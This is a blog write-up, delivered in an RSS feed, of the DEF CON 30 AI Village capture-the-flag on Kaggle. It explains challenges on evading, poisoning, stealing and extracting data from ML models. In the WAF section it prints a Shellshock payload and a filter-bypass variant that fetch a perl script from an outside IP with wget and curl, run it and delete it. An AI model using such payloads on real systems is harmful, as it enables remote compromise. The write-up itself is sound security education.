<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: almamon rasool abdali</title>
    <description>The latest articles on DEV Community by almamon rasool abdali (@mamon).</description>
    <link>https://dev.to/mamon</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F486730%2F911322db-fecc-41de-bc67-82f6f94bec2b.jpg</url>
      <title>DEV Community: almamon rasool abdali</title>
      <link>https://dev.to/mamon</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/mamon"/>
    <language>en</language>
    <item>
      <title>D3FC0N30 CTF Writeup : Hacking This AI</title>
      <dc:creator>almamon rasool abdali</dc:creator>
      <pubDate>Sat, 17 Sep 2022 23:09:14 +0000</pubDate>
      <link>https://dev.to/mamon/d3fc0n30-ctf-writeup-hacking-this-ai-3lp4</link>
      <guid>https://dev.to/mamon/d3fc0n30-ctf-writeup-hacking-this-ai-3lp4</guid>
      <description>&lt;p&gt;it been few days since the CTF end , and feel something missing .. yes i missed where i used to crack my brain and try find solutions for tasks to hack some ml model while only have half hour hr after midnight to think act and hack the AI.&lt;br&gt;
what it was about ???&lt;br&gt;
&lt;strong&gt;it was about evading, poisoning, stealing, and fooling AI/ML&lt;/strong&gt;&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--o2ldb9gj--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7pquxa6pgawgz41r9gtt.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--o2ldb9gj--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7pquxa6pgawgz41r9gtt.jpg" alt="Image description" width="666" height="500"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So imagine you browse Kaggle trying to find a new, non-boring competition where you can do something different (no ensembling 10 or 40 models to get an extra 0.001 improvement),&lt;br&gt;
and you find something starting with D3fC0n on Kaggle (what, why, how???)&lt;br&gt;
An AI security CTF, and on Kaggle... yes, let's play&lt;/p&gt;

&lt;p&gt;That was me when I got into this CTF.&lt;br&gt;
Now let's talk about each challenge:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;HOTDOG (id: hotdog) -- 200 Points&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt;Scenario&lt;/strong&gt;&lt;br&gt;
This is Chester. He's heard of Hotdog/Not Hotdog, but really wants to be classified as a hot-dog (get it?).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;br&gt;
Think of it as a gate with no guard: since nothing intercepts or checks the input, my solution was simply to submit a real hotdog image.&lt;/p&gt;

&lt;p&gt;I don't think we need a reference here, but the message is: never trust user input; you must always have extra checks.&lt;br&gt;
solution link &lt;a href="https://www.kaggle.com/code/iraqai/d3fc0n30-ctf-writeup-with-logic-no-luck#HOTDOG-(id:-hotdog)----200-Points"&gt;here &lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Math&lt;/strong&gt;&lt;br&gt;
This series of "Math" challenges is designed to introduce the concepts of dimensionality.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Math Challenge 1 (id: math_1) -- 100 Points&lt;/strong&gt;&lt;br&gt;
How many clusters are in the clusters1.npy, clusters2.npy, and clusters3.npy? The key is the number of clusters in order, with no spaces. These files are available in the input directory under math.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;br&gt;
Definition of clustering: cluster analysis, or clustering, is the task of grouping a set of objects such that objects in the same group (called a cluster) are more similar to each other than to objects in other groups.&lt;br&gt;
In clustering, getting the right number of clusters is usually about visualization when possible; one standard approach is the elbow method to find the optimal number of clusters. Explore the data, run the elbow method, and pick the best numbers.&lt;/p&gt;
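&lt;p&gt;As a minimal sketch of the elbow method (scikit-learn's KMeans on synthetic blobs; the real clusters*.npy files are not reproduced here, so the data below is made up):&lt;/p&gt;

```python
import numpy as np
from sklearn.cluster import KMeans

def elbow_inertias(data, k_range):
    """Fit KMeans for each k and collect the inertia (sum of squared
    distances to the closest centroid); the bend ("elbow") in this
    curve suggests the natural number of clusters."""
    inertias = []
    for k in k_range:
        km = KMeans(n_clusters=k, n_init=10, random_state=0).fit(data)
        inertias.append(km.inertia_)
    return inertias

# synthetic stand-in for clusters1.npy: three well-separated blobs
rng = np.random.default_rng(0)
data = np.vstack([rng.normal(loc=c, scale=0.3, size=(50, 2))
                  for c in ((0, 0), (5, 5), (10, 0))])

inertias = elbow_inertias(data, range(1, 7))
# the inertia drops sharply until k=3, then flattens: the elbow is at 3
```

&lt;p&gt;Plotting the inertias against k makes the bend obvious; for the challenge you would repeat this for each .npy file and concatenate the three answers.&lt;/p&gt;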

&lt;p&gt;What the organizers wanted from this (just to make sure we understand dimensionality reduction and clustering): when you try to detect anomalies, you will mostly do clustering and visualization to spot them&lt;/p&gt;

&lt;p&gt;solution &lt;strong&gt;link&lt;/strong&gt; &lt;a href="https://www.kaggle.com/code/iraqai/d3fc0n30-ctf-writeup-with-logic-no-luck#Math-Challenge-1-(id:-math_1)----100-Points"&gt;here&lt;/a&gt; &lt;br&gt;
ref&lt;br&gt;
&lt;a href="https://www.scikit-yb.org/en/latest/api/cluster/elbow.html#:%7E:text=The%20elbow%20method%20runs%20k,point%20to%20its%20assigned%20center"&gt;https://www.scikit-yb.org/en/latest/api/cluster/elbow.html#:~:text=The%20elbow%20method%20runs%20k,point%20to%20its%20assigned%20center&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.geeksforgeeks.org/elbow-method-for-optimal-value-of-k-in-kmeans/"&gt;https://www.geeksforgeeks.org/elbow-method-for-optimal-value-of-k-in-kmeans/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Math Challenge 2 (id: math_2) -- 200 Points&lt;/strong&gt;&lt;br&gt;
What's the dimensionality of the data in first_dim1.npy, first_dim2.npy, and first_dim3.npy? The key is the number of dimensions in order, with no spaces. These files are available in the input directory under math.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;br&gt;
At first glance you might say we can just print the data shape to get the dimensionality, but the point here is to introduce dimensionality reduction so it can help in the next tasks. Not all data can be easily visualized; dimensionality reduction can help a lot while keeping the important features.&lt;/p&gt;

&lt;p&gt;Dimensionality reduction refers to techniques that reduce the number of input variables in a dataset.&lt;/p&gt;

&lt;p&gt;More input features often make a predictive modeling task more challenging to model, more generally referred to as the curse of dimensionality.&lt;/p&gt;

&lt;p&gt;High-dimensionality statistics and dimensionality reduction techniques are often used for data visualization. Nevertheless these techniques can be used in applied machine learning to simplify a classification or regression dataset in order to better fit a predictive model.&lt;/p&gt;

&lt;p&gt;the organizers wanted to introduce the foundations of dimensionality reduction here so everyone would be on the same page&lt;/p&gt;
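&lt;p&gt;A minimal sketch of the idea with plain NumPy (the first_dim*.npy files are not reproduced here, so the data is synthetic: intrinsic dimensionality 2 lifted into 10 ambient dimensions by a random linear map):&lt;/p&gt;

```python
import numpy as np

def intrinsic_dim(data, tol=1e-8):
    """Count the singular values that carry non-negligible variance;
    this is the same idea PCA's explained-variance ratio is built on."""
    centered = data - data.mean(axis=0)
    s = np.linalg.svd(centered, compute_uv=False)
    return int((s > tol * s[0]).sum())

# build 2-D data, then lift it into 10 dimensions with a random linear map
rng = np.random.default_rng(0)
low = rng.normal(size=(200, 2))      # true dimensionality: 2
lift = rng.normal(size=(2, 10))      # embedding into 10-D
high = low @ lift                    # shape (200, 10)

print(high.shape, intrinsic_dim(high))    # (200, 10) 2
```

&lt;p&gt;Printing the shape says 10, but the singular-value spectrum reveals the real answer, which is the point of the challenge.&lt;/p&gt;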

&lt;p&gt;solution link is &lt;a href="//kaggle.com/code/iraqai/d3fc0n30-ctf-writeup-with-logic-no-luck#Math-Challenge-2-(id:-math_2)----200-Points"&gt;here &lt;/a&gt;&lt;br&gt;
Ref&lt;br&gt;
&lt;a href="https://neptune.ai/blog/dimensionality-reduction"&gt;https://neptune.ai/blog/dimensionality-reduction&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://machinelearningmastery.com/dimensionality-reduction-for-machine-learning/"&gt;https://machinelearningmastery.com/dimensionality-reduction-for-machine-learning/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://scikit-learn.org/stable/modules/generated/sklearn.decomposition.PCA.html"&gt;https://scikit-learn.org/stable/modules/generated/sklearn.decomposition.PCA.html&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Math Challenge 3 (id: math_3) -- 300 Points&lt;/strong&gt;&lt;br&gt;
What's the dimensionality of the data in second_dim1.npy, second_dim2.npy, and second_dim3.npy? The key is the number of the dimensionality in order, with no spaces. These files are available in the input directory under math.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;br&gt;
This repeats math_1 but with a harder cluster decision... the elbow method saves us again&lt;/p&gt;

&lt;p&gt;solution is &lt;a href="https://www.kaggle.com/code/iraqai/d3fc0n30-ctf-writeup-with-logic-no-luck#Math-Challenge-3-(id:-math_3)----300-Points"&gt;here &lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Math Challenge 4 (id: math_4) -- 400 Points&lt;/strong&gt;&lt;br&gt;
What's the dimensionality of the clusters in clusters1.npy? The key is the dimensions ordered by cluster size (smallest to largest), with no spaces. These files are available in the input directory under math.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;solution&lt;/strong&gt;&lt;br&gt;
As the task suggests, order the dimensionalities by cluster size. The idea is to first reduce the data dimensionality correctly, then find the cluster sizes, and finally report back, so it combines math_1 and math_2: first find the best number of clusters, then for each cluster find its dimensionality by reducing it to the best fit, and order the resulting dimensionalities by the size of each cluster (the number of members in it). But there is more to it: it teaches us how to do clustering in real life and how to work with high-dimensional data when analyzing for anomalies.&lt;/p&gt;

&lt;p&gt;solution link is &lt;a href="https://www.kaggle.com/code/iraqai/d3fc0n30-ctf-writeup-with-logic-no-luck#Math-Challenge-4-(id:-math_4)----400-Points"&gt;here &lt;/a&gt;&lt;br&gt;
Ref&lt;br&gt;
&lt;a href="https://towardsdatascience.com/k-means-clustering-and-principal-component-analysis-in-10-minutes-2c5b69c36b6b"&gt;https://towardsdatascience.com/k-means-clustering-and-principal-component-analysis-in-10-minutes-2c5b69c36b6b&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.researchgate.net/publication/349368388_An_email_content-based_insider_threat_detection_model_using_anomaly_detection_algorithms/figures?lo=1"&gt;https://www.researchgate.net/publication/349368388_An_email_content-based_insider_threat_detection_model_using_anomaly_detection_algorithms/figures?lo=1&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.kaggle.com/code/kooose/anomaly-detection-by-clustering"&gt;https://www.kaggle.com/code/kooose/anomaly-detection-by-clustering&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;WIFI (id: wifi) -- 200 Points&lt;br&gt;
Scenario&lt;/strong&gt;&lt;br&gt;
You really need to check your email, unfortunately you don't know the password. Fortunately, someone wrote it down. Unfortunately, it's written down on a low-dimensional manifold embedded in a very high-dimensional space. Check out the wifi/Embedded characters.npz file -- a list of tokens is given in the tokens key with their corresponding embeddings in the same order under the embeddings key -- and recover the password.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;&lt;br&gt;
The password is your flag, like all others, it has the format FLAG{something}&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;br&gt;
First, they give us an embedding of the password and the alphabet, which is the tokens. They also mention that the embedding is low-dimensional but has been lifted into a much higher-dimensional space, so we use our skills to reduce the dimensionality first. Then we calculate distances starting from what we know, the characters of FLAG with '{', to whichever characters lie nearest in the embedding space, until we reach '}'.&lt;/p&gt;

&lt;p&gt;we then trace the embedding from FLAG{ .... until we get }&lt;/p&gt;
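&lt;p&gt;The tracing step can be sketched like this. The tokens/embeddings layout mimics the challenge's .npz file, but the data here is a toy stand-in: tokens placed along a 1-D manifold so that greedily walking to the nearest unvisited neighbour spells out the password:&lt;/p&gt;

```python
import numpy as np

# toy stand-in for "Embedded characters.npz": each token of the password
# sits at increasing positions on a 1-D manifold (the real challenge
# hides this structure in a high-dimensional space)
password = "FLAG{t0y}"
tokens = np.array(list(password))
embeddings = np.arange(len(password), dtype=float).reshape(-1, 1)

def trace(tokens, embeddings, start_idx):
    """Greedily walk to the nearest unvisited embedding, collecting tokens."""
    visited = {start_idx}
    order = [start_idx]
    cur = start_idx
    while len(visited) != len(tokens):
        dists = np.linalg.norm(embeddings - embeddings[cur], axis=1)
        dists[list(visited)] = np.inf     # never revisit a token
        cur = int(np.argmin(dists))
        visited.add(cur)
        order.append(cur)
    return "".join(tokens[order])

recovered = trace(tokens, embeddings, start_idx=0)   # start from 'F'
print(recovered)    # FLAG{t0y}
```

&lt;p&gt;In the real challenge you would first reduce the embeddings to the manifold's dimensionality, then do the same nearest-neighbour walk from the known FLAG{ prefix.&lt;/p&gt;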

&lt;p&gt;solution link is &lt;a href="https://www.kaggle.com/code/iraqai/d3fc0n30-ctf-writeup-with-logic-no-luck#WIFI-(id:-wifi)----200-Points"&gt;here&lt;/a&gt; &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;HOTTERDOG (id: hotterdog) -- 400 Points&lt;br&gt;
Scenario&lt;/strong&gt;&lt;br&gt;
Chester submitted himself in the "most creative hotdog" contest. They use machine vision to score the hotdogs, but oh no he already submitted his headshot.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;&lt;br&gt;
Help Chester classify as a hotdog, but it has to look like Chester to a human. Modify his picture to fool a classifier.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;solution&lt;/strong&gt;&lt;br&gt;
For this one I used the Fast Gradient Sign Method (FGSM) attack. It ran in a separate notebook; I will put the code here later, and the idea of the attack and references will be added soon.&lt;/p&gt;
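&lt;p&gt;A minimal, self-contained FGSM sketch on a hand-rolled logistic-regression stand-in (the weights and input below are made up for illustration; the real attack targets Chester's image classifier, usually through PyTorch or TensorFlow gradients):&lt;/p&gt;

```python
import numpy as np

# tiny stand-in "classifier": logistic regression with fixed weights
w = np.array([1.0, -2.0, 0.5])
b = 0.1

def predict_proba(x):
    return 1.0 / (1.0 + np.exp(-(x @ w + b)))

def fgsm(x, y_true, eps):
    """FGSM: x_adv = x + eps * sign(d loss / d x); for logistic loss
    the gradient with respect to the input is (p - y) * w."""
    grad = (predict_proba(x) - y_true) * w
    return x + eps * np.sign(grad)

x = np.array([0.5, -0.5, 1.0])            # classified as class 1
x_adv = fgsm(x, y_true=1.0, eps=0.8)
print(predict_proba(x) > 0.5, predict_proba(x_adv) > 0.5)   # True False
```

&lt;p&gt;For images the same sign-of-gradient step is applied per pixel with a small eps, which is why the perturbed picture still looks like Chester to a human.&lt;/p&gt;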

&lt;p&gt;&lt;strong&gt;Honorstudent (id: honorstudent) -- 300 Points&lt;br&gt;
Scenario&lt;/strong&gt;&lt;br&gt;
Look at your report card! That's an F. You won't be able to go to homecoming with that grade. Can you use some carefully placed whiteout to fool your parents into thinking it's an A?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;&lt;br&gt;
Modify and submit your tampered f.png. Be careful to not overdo it!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;br&gt;
After checking it:&lt;/p&gt;

&lt;p&gt;it must be a grayscale image, or the system will refuse it and treat it as a tampered image&lt;/p&gt;

&lt;p&gt;the idea is that you must balance between F and A ===&amp;gt; wait wait ... balance why not just add image of char  A into image of F ? lets try !!&lt;br&gt;
solution link is &lt;a href="https://www.kaggle.com/code/iraqai/d3fc0n30-ctf-writeup-with-logic-no-luck#Honorstudent-(id:-honorstudent)----300-Points"&gt;here&lt;/a&gt; &lt;/p&gt;
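&lt;p&gt;The blending idea, sketched with synthetic grayscale arrays (the real f.png is not reproduced, and the crude letter shapes and alpha value here are illustrative):&lt;/p&gt;

```python
import numpy as np

# synthetic 8x8 grayscale stand-ins for f.png and an image of 'A'
f_img = np.zeros((8, 8), dtype=np.uint8)
f_img[1:7, 2] = 255; f_img[1, 2:6] = 255; f_img[3, 2:5] = 255        # crude F
a_img = np.zeros((8, 8), dtype=np.uint8)
a_img[1:7, 5] = 255; a_img[1:7, 7] = 255
a_img[1, 5:8] = 255; a_img[4, 5:8] = 255                             # crude A

def blend(base, overlay, alpha=0.25):
    """Add a faint copy of `overlay` on top of `base`, clipped to uint8.
    A small alpha keeps the result looking like `base` to a human while
    nudging the classifier's features toward `overlay`."""
    out = base.astype(float) + alpha * overlay.astype(float)
    return np.clip(out, 0, 255).astype(np.uint8)

tampered = blend(f_img, a_img)   # still grayscale, still mostly an F
```

&lt;p&gt;Tuning alpha is the "don't overdo it" part: too high and a human (or the tamper check) notices, too low and the classifier still sees an F.&lt;/p&gt;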

&lt;p&gt;&lt;strong&gt;Bad to Good (id: bad_to_good) -- 300 Points&lt;br&gt;
Scenario&lt;/strong&gt;&lt;br&gt;
You can’t buy a homecoming ticket if you get classified as a “good student”. Can you help Henry poison the classifier? He can only access one of four classes' grades, but he can influence everyone in the class.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;&lt;br&gt;
Modify and submit your tampered csv. Try and get Henry classified as a good student. Be careful to not overdo it!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;solution&lt;/strong&gt;&lt;br&gt;
the idea is to check the correlation between the features and the score, and try to add, subtract, and scale until we get the right score&lt;/p&gt;

&lt;p&gt;Demerits have negative impact mean the lower it get it can give us higher score&lt;br&gt;
also absences have fraction of good impact on the score&lt;br&gt;
can we get the score we want with clanging only (Demerits and Absences ) ????&lt;br&gt;
solution link is &lt;a href="https://www.kaggle.com/code/iraqai/d3fc0n30-ctf-writeup-with-logic-no-luck#Bad-to-Good-(id:-bad_to_good)----300-Points"&gt;here&lt;/a&gt;&lt;/p&gt;
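&lt;p&gt;The correlation check driving the attack, sketched with synthetic numbers (the feature names Demerits and Absences come from the challenge, but the grading rule and data below are invented):&lt;/p&gt;

```python
import numpy as np

rng = np.random.default_rng(0)
n = 500
demerits = rng.integers(0, 10, size=n).astype(float)
absences = rng.integers(0, 5, size=n).astype(float)
noise = rng.normal(scale=1.0, size=n)

# hypothetical grading rule: demerits hurt the score, absences help a bit
score = 80 - 5.0 * demerits + 2.0 * absences + noise

corr_demerits = np.corrcoef(demerits, score)[0, 1]
corr_absences = np.corrcoef(absences, score)[0, 1]
# demerits correlate negatively with the score, absences positively,
# so lowering Demerits (and nudging Absences) pushes the score up
```

&lt;p&gt;Once you see the signs and rough magnitudes, you know which columns of the csv to edit for Henry's class, and by how much, without touching anything else.&lt;/p&gt;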

&lt;p&gt;&lt;strong&gt;Baseball (id: baseball) -- 300 Points&lt;br&gt;
Scenario&lt;/strong&gt;&lt;br&gt;
Henry has to miss baseball tryouts to get ready for his date. Can you cover for him? Henry is a pitcher and the team uses software to analyze pitch patterns to classify pitchers.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;&lt;br&gt;
Throw 15 pitches at x,y (each bounded on [0,29]). Check out test_pitch.json to see the expected format. Can you throw 15 pitches to get classified as Henry?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;br&gt;
It is all about the pattern of our target, Henry: where does he mostly throw the ball on the grid (lower left, center left, upper left, lower center, upper center, lower right, center right, upper right)? Also consider whether our player, as time goes on, gets more focused or gets weaker and throws balls away. The main idea is to put the majority of the data in one specific place. This relates to both bad_to_good and all the math problems: by now you understand clustering and can spot patterns by eye in the data you have. So can you produce a pattern that makes the model predict you as Henry? After a few tries I found that the area between the upper middle and the center of the grid is Henry's spot, plus some noise (a few throws unrelated to Henry, to make it look like real data).&lt;/p&gt;
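&lt;p&gt;Generating such a submission can be sketched like this (the cluster centers and the "pitches" key below are illustrative guesses; check test_pitch.json for the exact format):&lt;/p&gt;

```python
import json
import random

random.seed(0)

def make_pitches(n=15, n_noise=2):
    """Cluster most pitches around one spot on the 30x30 grid (the
    centers here are illustrative, not Henry's real region), plus a
    couple of random throws as noise."""
    pitches = []
    for _ in range(n - n_noise):
        x = min(29, max(0, 15 + random.randint(-2, 2)))
        y = min(29, max(0, 22 + random.randint(-2, 2)))
        pitches.append({"x": x, "y": y})
    for _ in range(n_noise):
        pitches.append({"x": random.randint(0, 29), "y": random.randint(0, 29)})
    return {"pitches": pitches}

payload = json.dumps(make_pitches())
```

&lt;p&gt;Shifting the cluster center around and resubmitting is how you search for the region the model attributes to Henry.&lt;/p&gt;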

&lt;p&gt;solution link is &lt;a href="https://www.kaggle.com/code/iraqai/d3fc0n30-ctf-writeup-with-logic-no-luck#Baseball--(id:-baseball)----300-Points"&gt;here&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;WAF (id: waf) -- 500 Points&lt;br&gt;
Scenario&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A ML model has been built to detect a 0-day. This model is used by a Web Application Firewall to block malicious requests.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The goal of the challenge is to discover what the 0-day is by what it is blocking, and then bypass the WAF to exploit the system.&lt;/p&gt;

&lt;p&gt;PS: The WAF assesses malicious strings in 5 characters blocks.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;br&gt;
First, since we have a hint that the given input example is somehow related to the 0-day (mFzaC==), let's search for an exploit with this value&lt;br&gt;
from here&lt;br&gt;
&lt;a href="https://www.exploit-db.com/search?text=mFzaC"&gt;https://www.exploit-db.com/search?text=mFzaC&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;now, as you can see, the original input comes from the base64 encoding of&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;bash -i ==&amp;gt; 'YmFzaCAtaQ=='&lt;/p&gt;
&lt;/blockquote&gt;
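&lt;p&gt;You can verify the base64 relationship in a few lines; the hint string mFzaC is an inner block of the encoding of bash -i:&lt;/p&gt;

```python
import base64

encoded = base64.b64encode(b"bash -i").decode()
print(encoded)                       # YmFzaCAtaQ==
assert base64.b64decode("YmFzaCAtaQ==") == b"bash -i"
assert "mFzaC" in encoded            # the 5-char block the WAF keys on
```

&lt;p&gt;This also explains the 5-character-block hint: the WAF scores substrings of the encoded payload, which is why a small prefix change can slide the blocks past its signatures.&lt;/p&gt;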

&lt;p&gt;Let's think about what that means: it is about RCE.&lt;br&gt;
We have now narrowed down the search area...&lt;br&gt;
After trying many things, I thought: why not try the famous Shellshock?&lt;br&gt;
so I crafted this exploit&lt;/p&gt;

&lt;p&gt;() { :;}; /bin/bash -c \"cd /tmp;wget &lt;a href="http://213.x.x.x/ji;curl"&gt;http://213.x.x.x/ji;curl&lt;/a&gt; -O /tmp/ji &lt;a href="http://213.x.x.x/ji"&gt;http://213.x.x.x/ji&lt;/a&gt; ; perl /tmp/ji;rm -rf /tmp/ji\"&lt;/p&gt;

&lt;p&gt;and my bypass was &lt;/p&gt;

&lt;p&gt;$U() { :;};$U /bin/bash -c \"cd /tmp;wget &lt;a href="http://213.12.11.1/ji;curl"&gt;http://213.12.11.1/ji;curl&lt;/a&gt; -O /tmp/ji &lt;a href="http://213.12.11.1/ji"&gt;http://213.12.11.1/ji&lt;/a&gt; ; perl /tmp/ji;rm -rf /tmp/ji\"&lt;/p&gt;

&lt;p&gt;and it worked&lt;br&gt;
solution link is &lt;a href="https://www.kaggle.com/code/iraqai/d3fc0n30-ctf-writeup-with-logic-no-luck#WAF-(id:-waf)----500-Points"&gt;here&lt;/a&gt;&lt;br&gt;
&lt;strong&gt;Ref&lt;/strong&gt;&lt;br&gt;
&lt;a href="http://ceur-ws.org/Vol-1525/paper-15.pdf"&gt;http://ceur-ws.org/Vol-1525/paper-15.pdf&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Excuse me, your training data is leaking (id: leakage) -- 200 Points&lt;br&gt;
Scenario&lt;/strong&gt;&lt;br&gt;
While digging around a poorly secured S3 bucket, you found an old version of a pretrained char-RNN model (leakage/pretrained_model.pt). The scripts in the same bucket suggest that -- in addition to doorstop Russian literature -- it was accidentally trained on a whole load of system files, including an unencrypted password file! Those files aren't around anymore, but you've got the model weights, and you've found an old myspace login: "xXx_SkynetKilla_xXx" (they were 13 at the time, and would rather forget the whole thing, thank you very much). Can you recover their password?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;&lt;br&gt;
The password is your flag, as usual it is in the format FLAG{something}&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;br&gt;
If you understand how to build next-character prediction with an RNN/LSTM/GRU, then it is clear we need to fix the forward cell so it predicts the next character, and iteratively recover the flag by appending each newly predicted character to the input and dropping a character from the left of the input.&lt;/p&gt;
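&lt;p&gt;The sliding-window decoding loop looks roughly like this; here a lookup table stands in for the model's forward pass, and the secret, window size, and flag are all made up:&lt;/p&gt;

```python
# toy stand-in for the char-RNN forward pass: a lookup table that maps a
# fixed-length context window to the next character (the real model does
# this with trained LSTM weights)
SECRET = "xXx_SkynetKilla_xXx:FLAG{demo}"
WINDOW = 8
table = {SECRET[i:i + WINDOW]: SECRET[i + WINDOW]
         for i in range(len(SECRET) - WINDOW)}

def predict_next(window):
    return table[window]

def recover(seed, max_len=100):
    """Append each predicted character and drop one from the left,
    exactly the sliding-window loop described above."""
    window = seed[-WINDOW:]
    out = ""
    for _ in range(max_len):
        c = predict_next(window)
        out += c
        window = window[1:] + c        # shift the context window
        if c == "}":                   # flags end with a closing brace
            break
    return out

flag = recover("xXx_SkynetKilla_xXx:")
print(flag)    # FLAG{demo}
```

&lt;p&gt;With the real pretrained_model.pt, predict_next would run the fixed forward cell and take the argmax over the character vocabulary.&lt;/p&gt;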

&lt;p&gt;solution link is &lt;a href="//kaggle.com/code/iraqai/d3fc0n30-ctf-writeup-with-logic-no-luck#Excuse-me,-your-training-data-is-leaking-(id:-leakage)----200-Points"&gt;here&lt;/a&gt;&lt;br&gt;
&lt;strong&gt;Ref&lt;/strong&gt;&lt;br&gt;
&lt;a href="https://machinelearningmastery.com/text-generation-lstm-recurrent-neural-networks-python-keras/"&gt;https://machinelearningmastery.com/text-generation-lstm-recurrent-neural-networks-python-keras/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;FORENSICS (id: forensics) -- 300 Points&lt;br&gt;
Scenario&lt;/strong&gt;&lt;br&gt;
ML Models have a lot of information stored within them that you might not realise is useful, such as the Model architecture and model name. For this challenge, we've swapped out the model name with the flag in the attached file.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;&lt;br&gt;
Retrieve the flag from the attached file (defcon-ai-village-ctf/forensics/forensics.h5). Try to do it by viewing the model in keras rather than just looking through the file :) PS, replace the () characters with {} in the flag submission.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;solution&lt;/strong&gt;&lt;br&gt;
I think here you can see the CTF was designed for security people with little or no ML skill, to teach some ML skills and tools: if we print the model, we get the flag.&lt;br&gt;
But maybe it is also a reminder to be careful about what data you load with this library. What I mean is: maybe someone injected an RCE into the model you load? Yes, something like this: &lt;a href="https://www.youtube.com/watch?v=2ethDz9KnLk"&gt;https://www.youtube.com/watch?v=2ethDz9KnLk&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;solution link is &lt;a href="https://www.kaggle.com/code/iraqai/d3fc0n30-ctf-writeup-with-logic-no-luck#FORENSICS-(id:-forensics)----300-Points"&gt;here&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;THEFT (id: theft) -- 100 Points&lt;br&gt;
Scenario&lt;/strong&gt;&lt;br&gt;
A client has spun up a website to identify images, is there a way to steal their machine learning model and use the knowledge within it to backdoor this photo of an owl to be a turtle (loggerhead).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;&lt;br&gt;
The goal of this challenge is to steal the model to do an offline evasion attack against it. A useful resource to get started is: &lt;a href="https://tcode2k16.github.io/blog/posts/picoctf-2018-writeup/general-skills/#solution-20"&gt;https://tcode2k16.github.io/blog/posts/picoctf-2018-writeup/general-skills/#solution-20&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution&lt;/strong&gt; &lt;br&gt;
adversarial perturbation of the image, as in "Explaining and Harnessing Adversarial Examples"&lt;/p&gt;

&lt;p&gt;the primary cause of neural networks' vulnerability to adversarial perturbation is their linear nature. This explanation is supported by new quantitative results while giving the first explanation of the most intriguing fact about them: their generalization across architectures and training sets. Moreover, this view yields a simple and fast method of generating adversarial examples. Using this approach to provide examples for adversarial training, we reduce the test set error of a maxout network on the MNIST dataset.&lt;/p&gt;

&lt;p&gt;solution link is &lt;a href="https://www.kaggle.com/code/iraqai/d3fc0n30-ctf-writeup-with-logic-no-luck#THEFT-(id:-theft)----100-Points"&gt;here&lt;/a&gt;&lt;br&gt;
&lt;strong&gt;ref&lt;/strong&gt;&lt;br&gt;
